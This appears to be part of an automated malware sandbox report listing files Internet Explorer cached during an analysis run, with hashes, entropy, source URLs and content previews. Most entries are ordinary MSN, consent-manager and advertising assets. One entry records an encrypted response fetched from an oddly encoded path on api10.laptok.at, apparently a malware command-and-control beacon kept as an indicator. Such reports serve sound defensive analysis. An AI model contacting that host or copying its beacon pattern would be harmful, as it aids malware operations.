                                                                                Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........(J....wIDAT8O.RKN.0.}v\....U....-.. ......8..{$...z..@.....+.......K...%)...I......C4.../XD].Y..:.w.....B9..7..Y..(.m.*3. .!..p..,.c.>.\<H.0.*...,w:.F..m...8c,.^........E.......S...G.%.y.b....Ab.V.-.}.=..."m.O..!...q.....]N.)..w..\..v^.^...u...k..0.....R.....c!.N...DN`)x..:.."*Brg.0avY.>.h...C.S...Fqv._.]......E.h.|Wg..l........@.$.Z.]....i8.$).t..y.W..H..H.W.8..B...'............IEND.B`.
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BB7hg4[1].png
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                Category:downloaded
                                                                                Size (bytes):458
                                                                                Entropy (8bit):7.172312008412332
                                                                                Encrypted:false
                                                                                SSDEEP:12:6v/78/kFj13TC93wFdwrWZdLCUYzn9dct8CZsWE0oR0Y8/9ki:u138apdLXqxCS7D2Y+
                                                                                MD5:A4F438CAD14E0E2CA9EEC23174BBD16A
                                                                                SHA1:41FC65053363E0EEE16DD286C60BEDE6698D96B3
                                                                                SHA-256:9D9BCADE7A7F486C0C652C0632F9846FCFD3CC64FEF87E5C4412C677C854E389
                                                                                SHA-512:FD41BCD1A462A64E40EEE58D2ED85650CE9119B2BB174C3F8E9DA67D4A349B504E32C449C4E44E2B50E4BEB8B650E6956184A9E9CD09B0FA5EA2778292B01EA5
                                                                                Malicious:false
                                                                                IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7hg4.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........(J...._IDAT8O.RMJ.@...&.....B%PJ.-.......... ...7..P..P....JhA..*$Mf..j.*n.*~.y...}...:...b...b.H<.)...f.U...fs`.rL....}.v.B..d.15..\T.*.Z_..'.}..rc....(...9V.&.....|.qd...8.j..... J...^..q.6..KV7Bg.2@).S.l#R.eE.. ..:_.....l.....FR........r...y...eIC......D.c......0.0..Y..h....t....k.b..y^..1a.D..|...#.ldra.n.0.......:@.C.Z..P....@...*......z.....p....IEND.B`.
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BBIbTiS[1].png
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                Category:downloaded
                                                                                Size (bytes):820
                                                                                Entropy (8bit):7.627366937598049
                                                                                Encrypted:false
                                                                                SSDEEP:24:U/6gJ+qQtUHyxNAM43wuJFnFMDF3AJ12DG7:U/6gMqQtUSxNT43BFnsRACC
                                                                                MD5:9B7529DFB9B4E591338CBD595AD12FF7
                                                                                SHA1:0A127FA2778A1717D86358F59D9903836FCC602E
                                                                                SHA-256:F1A3EA0DF6939526DA1A6972FBFF8844C9AD8006DE61DD98A1D8A2FB52E1A25D
                                                                                SHA-512:4154EC25031ED6BD2A8473F3C3A3A92553853AD4DEFBD89DC4DD72546D8ACAF8369F0B63A91E66DC1665CE47EE58D9FDD2C4EEFCC61BF13C87402972811AB527
                                                                                Malicious:false
                                                                                IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBIbTiS.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs.................IDAT8O.S.K.Q....m.[.L\.,%I*..S......^.^.z..^..{..-.Bz.....MA+...........{W....p.9..;.s....^..z..!...+..#....3.P..p.z5.~..x>.D.].h.~m..Z..c.5..n..w...S."..U.....X.o...;}.f..:.}]`..<S...7.P{k..T.*....K.._.E..%x.?eRp..{.....9.......,,..L.......... .......})..._ TM)..Z.mdQ.......sY .q..,.T1.y.,lJ.y...'?...H..Y...SB..2..b.v.ELp....~.u.S...."8..x1{O....U..Q...._.aO.KV.D\..H..G..#..G.@.u.......3...'...sXc.2s.D.B...^z....I....y...E..v.l.M0.&k`.g....C.`..*..Q..L.6.O&`.t@..|..7.$Zq...J.. X..ib?,.;&.....?..q.Q.,Bq.&......:#O....o..5.A.K..<..'.+.z...V...&. .......r...4t.......g......B.+-..L3....;ng>..}(.....y.....PP.-.q.....TB........|HR..w..-....F.....p...3.,..x..q..O..D......)..Vd.....IEND.B`.
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BBaK3KR[1].png
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                Category:downloaded
                                                                                Size (bytes):551
                                                                                Entropy (8bit):7.412246442354541
                                                                                Encrypted:false
                                                                                SSDEEP:12:6v/78/kF5ij6uepiHibgdj9hUxSzDLpJL8cs3NKH3bnc7z:WO65iHibeBQSvL7S3N03g
                                                                                MD5:5928F2F40E8032C27F5D77E3152A8362
                                                                                SHA1:22744343D40A5AF7EA9A341E2E98D417B32ABBE9
                                                                                SHA-256:5AF55E02633880E0C2F49AFAD213D0004D335FF6CB78CAD33FCE4643AF79AD24
                                                                                SHA-512:364F9726189A88010317F82A7266A7BB70AA97C85E46D15D245D99C7C97DB69399DC0137F524AE5B754142CCCBD3ACB6070CAFD4EC778DC6E6743332BDA7C7B1
                                                                                Malicious:false
                                                                                IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBaK3KR.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........(J.....IDAT8O..9,.q..:&.E..#.,B".D.Zll..q,H.......DH..X5.@....P!.#......m?...~C....}......M\.....hb.G=..}.N..b.LYz.b.%.>..}...]..o$..2(.OF_..O./...pxt%...................S.mf..4..p~y...#:2.C......b.........a.M\S.!O.Xi.2.....DC... e7v.$.P[....l..Gc..OD...z..+u...2a%.e.....J.>..s.............]..O..RC....>....&.@.9N.r...p.$..=.d|fG%&..f...kuy]7....~@eI.R....>.......DX.5.&..,V;.[..W.rQA.z.r.].......%N>\..X.e.n.^&.ij...{.W....T.......IEND.B`.
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\de-ch[1].json
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                Category:downloaded
                                                                                Size (bytes):76785
                                                                                Entropy (8bit):5.343242780960818
                                                                                Encrypted:false
                                                                                SSDEEP:768:olAy9XsiItnuy5zIux1whjCU7kJB1C54AYtiQzNEJEWlCFPQtihPxVUYUEJ0YAtF:olLEJxa4CmdiuWloIti1wYm7B
                                                                                MD5:DBACAF93F0795EB6276D58CC311C1E8F
                                                                                SHA1:4667F15EAB575E663D1E70C0D14FE2163A84981D
                                                                                SHA-256:51D30486C1FE33A38A654C31EDB529A36338FBDFA53D9F238DCCB24FF42F75AF
                                                                                SHA-512:CFC1986EF5C82A9EA3DCD22460351DA10CF17BA6CDC1EE8014AAA8E2A255C66BB840B0A5CC91E0EB42E6FE50EC0E2514A679EA960C827D7C8C9F891E55908387
                                                                                Malicious:false
                                                                                IE Cache URL:https://www.msn.com/_h/e012d846/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-86263d365d28/6f0cca92-2dda-4588-a757-0e009f333603/de-ch.json
                                                                                Preview: {"DomainData":{"pclifeSpanYr":"Year","pclifeSpanYrs":"Years","pclifeSpanSecs":"A few seconds","pclifeSpanWk":"Week","pclifeSpanWks":"Weeks","cctId":"55a804ab-e5c6-4b97-9319-86263d365d28","MainText":"Ihre Privatsph.re","MainInfoText":"Wir verarbeiten Ihre Daten, um Inhalte oder Anzeigen bereitzustellen, und analysieren die Bereitstellung solcher Inhalte oder Anzeigen, um Erkenntnisse .ber unsere Website zu gewinnen. Wir geben diese Informationen auf der Grundlage einer Einwilligung und eines berechtigten Interesses an unsere Partner weiter. Sie k.nnen Ihr Recht auf Einwilligung oder Widerspruch gegen ein berechtigtes Interesse aus.ben, und zwar auf der Grundlage eines der folgenden bestimmten Zwecke oder auf Partnerebene .ber den Link unter jedem Zweck. Diese Entscheidungen werden an unsere Anbieter, die am Transparency and Consent Framework teilnehmen, signalisiert.","AboutText":"Weitere Informationen","AboutCookiesText":"Ihre Privatsph.re","ConfirmText":"Alle zulassen","AllowAll
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\ha[1].htm
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                Category:downloaded
                                                                                Size (bytes):2464
                                                                                Entropy (8bit):5.985101502504591
                                                                                Encrypted:false
                                                                                SSDEEP:48:IwgrwffRMN+4xpihcoAtmdydQ+nR4z3Swa0FUBmmX3Aw6Ixt6iMibzuM8WyVN:Iwgk3RFutmKQi4r1kHAwjxpV2M8L
                                                                                MD5:A214C9D621F37A4A5DD418FE4B986283
                                                                                SHA1:96B4D5DED9599F50A7557A927384A054721496C6
                                                                                SHA-256:A63A214D997D6A6B91E278F99EE16E9EDD06ABC4C515797838E22B8E59C96784
                                                                                SHA-512:9D7F21113869653138AF6DE31ED741CC17EA7C5FD0EA2540290AB31B1730E77D0226C0565328466B7A578074F4793EAE14E881E69D7C2F8D5D354A130E97779E
                                                                                Malicious:false
                                                                                IE Cache URL:http://api10.laptok.at/api1/_2FrbYdUuuog2_2Ft/o0Q4kJ3uiNvB/BVkhCT_2FjP/kgnCFaoGSZ_2FP/XoK_2BtWhs_2FNzdBvmlH/vt_2B9x1x6ck65MR/ZpG7Z5d4NVWsbef/IA3fJ5Djq3zGkBqE7x/LReOBCAcB/qC_2F1dmcLdFTOEEnZgz/STGZ2dxkKMV5RKreGCr/RFkW6kLd_2Bklvq9QHSZcn/We3rTC8YPIxkv/L14t5cJM/ZLd1Hb81ZBMybrjlIjy_2Fg/_2F_2FS_2F/TBW_2Bf883H2QksUF/tthcWoumhUqM/8KeCGS7jeEC/1wCg0gHPiLWtYc/_2Fsv97M6I2fbFhoAJh9s/q_2FhY0fUvPWozDY/zNJTP3X_2B7F8/ha
                                                                                Preview: yH1jdu6A3JXa3Lq3zi2fILvgOkzlvcXN9uLrxhqmjf7xZ9FlGvpMoGwaRCwOHC/VJHobp6f5mxQDagdXf/UAykqOez2iAi8S1QTxI5RjciQ9M3zJ0gO+uB+8UjKkmhXXi8zFhjqj6P/xOgW/cj3KpjoEfV447fouT6/cGaELhOBtGrGYRpwNPPm+4diOo2POKlysoWnAzdgVA5dtjvhPkBXKpqO7l/JlZHCGmL1OvwLvkrTbCf1U4Tq4/HT/NrZ22ih3uLfsgJooHHxSOzfrHo666q7tTAmlZ1UntrTIm/QQmAjpFTqZavEeuxOCFsISObUg7E5LQ1dIfLBq0oQ4ksS/1KnZAuSTq4SNqmSu9DW4uAQkIk+N9gy6ZFeIf7xvhvpAixu+hYTmR9yLxU/Qb0z1aBU4Hj8ERvvOz/MKwQd5VBw43xKJJOF5BBMU3Pki/SXdkzLqVWVHG2Rg57xug1xL7LMC7zWaP8R7J1vMH0AgFkJ2nfTlFNCjm+KQa/t+BbaaQFyBcVeVpQ3pF2nvbiiwK2n8sE0k4Ph7uoIzN2yMwbgHk3+anOifiPAhaMju58fIJ4WaUvwESVZkBw/hGX7XpxAPBTdEbRvnLspelcDP659e9xh9ql7VgTtCF1cArfTXZbhjik8shl2NFbFC0Hvj/DseaIhwN/UHuS1BoHf8TNQ6i103oFq7s7Krif5AkWhM9ch6ZDz42UUt4OvaHicTbXJfHWLH6jF9O8P3Bmfe/7fbd4ZsW2A/bjkowyXYhKJfNQJliooD/r2+3MNXX3b60IE/20q+rVPqJer3QaqMAc6GhvUMEwiYYX4m2+Vt44nItwj+CZYK36CiIq6z/3Hukr1gIDWJ7ExtFGVnhs2ZHRZ+3AMz2J0gr9iFY2pdTXgeJA40mOUlHiYdnLVe3/K+oqbSSc95y3pVukE2MDbyJa6owW73M6kqG/cptKjYODRdeQSR5esF7eSOaeJq+I9U8qtrhkqaUmKyiXcq
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\http___cdn.taboola.com_libtrc_static_thumbnails_1922f0dc8699bf8edcf7c727cbc43d75[1].jpg
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                                                Category:downloaded
                                                                                Size (bytes):33654
                                                                                Entropy (8bit):7.93677204324885
                                                                                Encrypted:false
                                                                                SSDEEP:768:BYyF/HAL/a8mvWHUHD1aJ1izFi/1kp99ssSdA:BxE/We0HD148j
                                                                                MD5:C63DABAF54A1E9D41C87A8D67E56D68A
                                                                                SHA1:C07BF0B5ED6DE22AC372782599D8A7ED74F82348
                                                                                SHA-256:2C676E5170D304519ED2F955C9F14B8D5D2535642A5A447A54FCCFE91C8AF80F
                                                                                SHA-512:47FD83E49A1D35C83D02B649D539B4B0D36A72E3B0586FBCDA9460AA1FB533A719983998C75B9EDF2E261563E47CA702A793801037EF207DDA5F3982CBA45107
                                                                                Malicious:false
                                                                                IE Cache URL:https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F1922f0dc8699bf8edcf7c727cbc43d75.jpg
                                                                                Preview: ......JFIF.............XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1........
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\http___cdn.taboola.com_libtrc_static_thumbnails_e422867e373581902d24ef95be7d4e1b[1].jpg
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                                                Category:downloaded
                                                                                Size (bytes):7445
                                                                                Entropy (8bit):7.93831956568165
                                                                                Encrypted:false
                                                                                SSDEEP:192:6Lj959JigoMQOL8q6TkMlYo6UsZlwtrGDWTInXeGcCS:6Lj/9Jdk+Ml76h2Kk
                                                                                MD5:C4B9684545B9781F5F19A99ECD6A95B5
                                                                                SHA1:C25C9E466C46184BE03D654BF13DED7D55E71C1B
                                                                                SHA-256:845E13CB4404F674F57C712D570BC9E353A2CB742722DA9116F272B9226C71F7
                                                                                SHA-512:1E0B379E40FB2099462BC75C653217469071D59408F9030E4255E65765140C7762F2332CE3FD78E18337EBCB0A95E729AB2C71A79B2761DE8C8700FA6455172E
                                                                                Malicious:false
                                                                                IE Cache URL:https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Fe422867e373581902d24ef95be7d4e1b.jpg
                                                                                Preview: ......JFIF...........................................%......%!(!.!(!;/))/;E:7:ESJJSici................................%......%!(!.!(!;/))/;E:7:ESJJSici.........7...."..........4.................................................................(..{P....>.#.....M..N+EF..*.=U.W.'.).0..(.ipG..u.K..JP..C.....[.%.p......My<$q..LI!......k..B .j$6..J...$V<.)rY.).....KK r&.&.+...I..@4..".-.h5s..X.9gJ...D..[........`./.rsn..'C.r|b..2^.m.V{.B.&./H....%..&..p>m.X.O..._`..'~.b/H....{.0.qcS.P.....R.]x.......zW.h.+.~.T..@..o..;.+..F....J.4.p......>..Q.U...L.p...v...&.e.D..R5*P.y.4K}.m.X.HK.. ..y.h.3eiP...h.[..u.,..B.1..c..$.(.*5Fn..5...j.;..I..k.j.......q....J.G.......g...H.J3b.I..@LJd.....g.9x<AgB._W..b.d.K..}.0..;^.hw.r...".....}..?...,......~.9..]....t...`"._P.D>M.[o.@...:.....n..]..Z...%?N...i?u../"..&.V.W0u..=.v.H.. ......6...7.?b.e}...!.......@..b.....G.t.......9...r...6..[..)......l[..m.}...Y)7.-.3..p.;......+..T*..S...5V..e....SE.V..M&..{.....
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\iab2Data[1].json
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                Category:downloaded
                                                                                Size (bytes):230026
                                                                                Entropy (8bit):5.150044456837813
                                                                                Encrypted:false
                                                                                SSDEEP:768:l3JqIWtk5N1cfkCHGd5btLkWUuSKQlqmPTZ1j5sIbUkjsyYAAA:l3JqIGk5Med5btLksSKkPnjNjh4A
                                                                                MD5:6AAA0F3074990A455B222A4D044E2346
                                                                                SHA1:6443AF82ED596527261B0F4367A67DD4D1BA855B
                                                                                SHA-256:1232E273F047113AB950CC141FC73D50640D2352B2ED16B89A1BAC01A80BEBEC
                                                                                SHA-512:EDE13CDE1DDEB45CD038042DCC6C1F75664EC259BC44100EB9C36361CFB657A7A661901DFEAD44DF6CEC555406A221970DF10F562AE222226546B7EFCE8E6E8D
                                                                                Malicious:false
                                                                                IE Cache URL:https://www.msn.com/_h/e012d846/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-86263d365d28/iab2Data.json
                                                                                Preview: {"gvlSpecificationVersion":2,"tcfPolicyVersion":2,"features":{"1":{"descriptionLegal":"Vendors can:\n* Combine data obtained offline with data collected online in support of one or more Purposes or Special Purposes.","id":1,"name":"Match and combine offline data sources","description":"Data from offline data sources can be combined with your online activity in support of one or more purposes"},"2":{"descriptionLegal":"Vendors can:\n* Deterministically determine that two or more devices belong to the same user or household\n* Probabilistically determine that two or more devices belong to the same user or household\n* Actively scan device characteristics for identification for probabilistic identification if users have allowed vendors to actively scan device characteristics for identification (Special Feature 2)","id":2,"name":"Link different devices","description":"Different devices can be determined as belonging to you or your household in support of one or more of purposes."},"3":{"de
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\nrrV67478[1].js
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                Category:downloaded
                                                                                Size (bytes):88164
                                                                                Entropy (8bit):5.423101112677061
                                                                                Encrypted:false
                                                                                SSDEEP:1536:DVnCuukXGsQihGZFu94xdV2E4q35nJy0ukWaaCUFP+i/TX6Y+fj4/fhAaTZae:DQiYpdVGetuVLKY+fjwZ
                                                                                MD5:C2DC0FFE06279ECC59ACBC92A443FFD4
                                                                                SHA1:C271908D08B13E08BFD5106EE9F4E6487A3CDEC4
                                                                                SHA-256:51A34C46160A51FB0EAB510A83D06AA9F593C8BEB83099D066924EAC4E4160BC
                                                                                SHA-512:6B9EB80BD6BC121F4B8E23FC74FD21C81430EE10B39B1EDBDEFF29C04A3116EB12FC2CC633A5FF4C948C16FEF9CD258E0ED0743D3D9CB0EE78A253B6F5CBE05D
                                                                                Malicious:false
                                                                                IE Cache URL:https://contextual.media.net/48/nrrV67478.js
                                                                                Preview: var _mNRequire,_mNDefine;!function(){"use strict";var c={},u={};function a(e){return"function"==typeof e}_mNRequire=function e(t,r){var n,i,o=[];for(i in t)t.hasOwnProperty(i)&&("object"!=typeof(n=t[i])&&void 0!==n?(void 0!==c[n]||(c[n]=e(u[n].deps,u[n].callback)),o.push(c[n])):o.push(n));return a(r)?r.apply(this,o):o},_mNDefine=function(e,t,r){if(a(t)&&(r=t,t=[]),void 0===(n=e)||""===n||null===n||(n=t,"[object Array]"!==Object.prototype.toString.call(n))||!a(r))return!1;var n;u[e]={deps:t,callback:r}}}();_mNDefine("modulefactory",[],function(){"use strict";var r={},e={},o={},i={},n={},t={},a={};function c(r){var e=!0,o={};try{o=_mNRequire([r])[0]}catch(r){e=!1}return o.isResolved=function(){return e},o}return r=c("conversionpixelcontroller"),e=c("browserhinter"),o=c("kwdClickTargetModifier"),i=c("hover"),n=c("mraidDelayedLogging"),t=c("macrokeywords"),a=c("tcfdatamanager"),{conversionPixelController:r,browserHinter:e,hover:i,keywordClickTargetModifier:o,mraidDelayedLogging:n,macroKeyw
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\otPcCenter[1].json
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                Category:downloaded
                                                                                Size (bytes):46394
                                                                                Entropy (8bit):5.58113620851811
                                                                                Encrypted:false
                                                                                SSDEEP:384:oj+X+jzgBCL2RAAaRKXWSU8zVrX0eQna41wFpWge0bRApQZInjatWLGuD3eWrwAs:4zgEFAJXWeNeIpW4lzZInuWjlHoQthI
                                                                                MD5:145CAF593D1A355E3ECD5450B51B1527
                                                                                SHA1:18F98698FC79BA278C4853D0DF2AEE80F61E15A2
                                                                                SHA-256:0914915E9870A4ED422DB68057A450DF6923A0FA824B1BE11ACA75C99C2DA9C2
                                                                                SHA-512:D02D8D4F9C894ADAB8A0B476D223653F69273B6A8B0476980CD567B7D7C217495401326B14FCBE632DA67C0CB897C158AFCB7125179728A6B679B5F81CADEB59
                                                                                Malicious:false
                                                                                IE Cache URL:https://www.msn.com/_h/e012d846/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/assets/v2/otPcCenter.json
                                                                                Preview: .. {.. "name": "otPcCenter",.. "html": "PGRpdiBpZD0ib25ldHJ1c3QtcGMtc2RrIiBjbGFzcz0ib3RQY0NlbnRlciBvdC1oaWRlIG90LWZhZGUtaW4iIGFyaWEtbW9kYWw9InRydWUiIHJvbGU9ImRpYWxvZyIgYXJpYS1sYWJlbGxlZGJ5PSJvdC1wYy10aXRsZSI+PCEtLSBDbG9zZSBCdXR0b24gLS0+PGRpdiBjbGFzcz0ib3QtcGMtaGVhZGVyIj48IS0tIExvZ28gVGFnIC0tPjxkaXYgY2xhc3M9Im90LXBjLWxvZ28iIHJvbGU9ImltZyIgYXJpYS1sYWJlbD0iQ29tcGFueSBMb2dvIj48L2Rpdj48YnV0dG9uIGlkPSJjbG9zZS1wYy1idG4taGFuZGxlciIgY2xhc3M9Im90LWNsb3NlLWljb24iIGFyaWEtbGFiZWw9IkNsb3NlIj48L2J1dHRvbj48L2Rpdj48IS0tIENsb3NlIEJ1dHRvbiAtLT48ZGl2IGlkPSJvdC1wYy1jb250ZW50IiBjbGFzcz0ib3QtcGMtc2Nyb2xsYmFyIj48aDMgaWQ9Im90LXBjLXRpdGxlIj5Zb3VyIFByaXZhY3k8L2gzPjxkaXYgaWQ9Im90LXBjLWRlc2MiPjwvZGl2PjxidXR0b24gaWQ9ImFjY2VwdC1yZWNvbW1lbmRlZC1idG4taGFuZGxlciI+QWxsb3cgYWxsPC9idXR0b24+PHNlY3Rpb24gY2xhc3M9Im90LXNkay1yb3cgb3QtY2F0LWdycCI+PGgzIGlkPSJvdC1jYXRlZ29yeS10aXRsZSI+TWFuYWdlIENvb2tpZSBQcmVmZXJlbmNlczwvaDM+PGRpdiBjbGFzcz0ib3QtcGxpLWhkciI+PHNwYW4gY2xhc3M9Im90LWxpLXRpdGxlIj5Db25zZW50PC9
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\otTCF-ie[1].js
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                Category:downloaded
                                                                                Size (bytes):102879
                                                                                Entropy (8bit):5.311489377663803
                                                                                Encrypted:false
                                                                                SSDEEP:768:ONkWT0m7r8N1qpPVsjvB6z4Yj3RCjnugKtLEdT8xJORONTMC5GkkJ0XcJGk58:8kunecpuj5QRCjnrKxJg0TMC5ZW8
                                                                                MD5:52F29FAC6C1D2B0BAC8FE5D0AA2F7A15
                                                                                SHA1:D66C777DA4B6D1FEE86180B2B45A3954AE7E0AED
                                                                                SHA-256:E497A9E7A9620236A9A67F77D2CDA1CC9615F508A392ECCA53F63D2C8283DC0E
                                                                                SHA-512:DF33C49B063AEFD719B47F9335A4A7CE38FA391B2ADF5ACFD0C3FE891A5D0ADDF1C3295E6FF44EE08E729F96E0D526FFD773DC272E57C3B247696B79EE1168BA
                                                                                Malicious:false
                                                                                IE Cache URL:https://www.msn.com/_h/e012d846/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/otTCF-ie.js
                                                                                Preview: !function(){"use strict";var c="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};function e(e){return e&&e.__esModule&&Object.prototype.hasOwnProperty.call(e,"default")?e.default:e}function t(e,t){return e(t={exports:{}},t.exports),t.exports}function n(e){return e&&e.Math==Math&&e}function p(e){try{return!!e()}catch(e){return!0}}function E(e,t){return{enumerable:!(1&e),configurable:!(2&e),writable:!(4&e),value:t}}function o(e){return w.call(e).slice(8,-1)}function u(e){if(null==e)throw TypeError("Can't call method on "+e);return e}function l(e){return I(u(e))}function f(e){return"object"==typeof e?null!==e:"function"==typeof e}function i(e,t){if(!f(e))return e;var n,r;if(t&&"function"==typeof(n=e.toString)&&!f(r=n.call(e)))return r;if("function"==typeof(n=e.valueOf)&&!f(r=n.call(e)))return r;if(!t&&"function"==typeof(n=e.toString)&&!f(r=n.call(e)))return r;throw TypeError("Can't convert object to primitive value")}function y(e,t){retur
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\58-acd805-185735b[1].css
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:UTF-8 Unicode text, with very long lines
                                                                                Category:dropped
                                                                                Size (bytes):248287
                                                                                Entropy (8bit):5.297047810331843
                                                                                Encrypted:false
                                                                                SSDEEP:3072:jaBMUzTAHEkm8OUdvUvbZkrlx6pjp4tQH:ja+UzTAHLOUdvUZkrlx6pjp4tQH
                                                                                MD5:A0AB539081F4353D0F375D2C81113BF3
                                                                                SHA1:8052F4711131B349AC5261304ED9101D1BAD1D0A
                                                                                SHA-256:2B669B3829A6FF3B059BA82D520E6CBD635A3FBA31CDC7760664C9F2E1A154B0
                                                                                SHA-512:6FA44FDC9FAE457A24AB2CEAB959945F1105CF32D73100EBE6F9F14733100B7AACDD7CA0992DE4FFA832A2CBCD06976F9D666F40545B92462CC101ECDB72685E
                                                                                Malicious:false
                                                                                Preview: @charset "UTF-8";div.adcontainer iframe[width='1']{display:none}span.nativead{font-weight:600;font-size:1.1rem;line-height:1.364}div:not(.ip) span.nativead{color:#333}.todaymodule .smalla span.nativead,.todaystripe .smalla span.nativead{bottom:2rem;display:block;position:absolute}.todaymodule .smalla a.nativead .title,.todaystripe .smalla a.nativead .title{max-height:4.7rem}.todaymodule .smalla a.nativead .caption,.todaystripe .smalla a.nativead .caption{padding:0;position:relative;margin-left:11.2rem}.todaymodule .mediuma span.nativead,.todaystripe .mediuma span.nativead{bottom:1.3rem}.ip a.nativead span:not(.title):not(.adslabel),.mip a.nativead span:not(.title):not(.adslabel){display:block;vertical-align:top;color:#a0a0a0}.ip a.nativead .caption span.nativead,.mip a.nativead .caption span.nativead{display:block;margin:.9rem 0 .1rem}.ip a.nativead .caption span.sourcename,.mip a.nativead .caption span.sourcename{margin:.5rem 0 .1rem;max-width:100%}.todaymodule.mediuminfopanehero .ip_
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\85-0f8009-68ddb2ab[1].js
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):391843
                                                                                Entropy (8bit):5.323521567582823
                                                                                Encrypted:false
                                                                                SSDEEP:6144:Rrf9z/Y7Sg/FDMxqkhmnid1WPqIjHSjae1dWgxO0Dvq4FcG6Ix2K:dJ/Ynznid1WPqIjHdYltHcGB3
                                                                                MD5:CDD6C5E31F58A546B6F9637389B2503B
                                                                                SHA1:0ADA1E1C82B8E7636F6DAF4CE78D571C80A3E81A
                                                                                SHA-256:4CC5BC89E9F4E54FE905AB22340FA3793FE04F30453DC17CE2780D61DB35D5D4
                                                                                SHA-512:11FD84FE2EAB4FFEBAF45D8D509E7E8E927540A3D67CCADB65AB7C7A7F22F1922411A02157B404D2CA652D6AEF8809B659C0D4106F2F57B6B02911D85B06A4DB
                                                                                Malicious:false
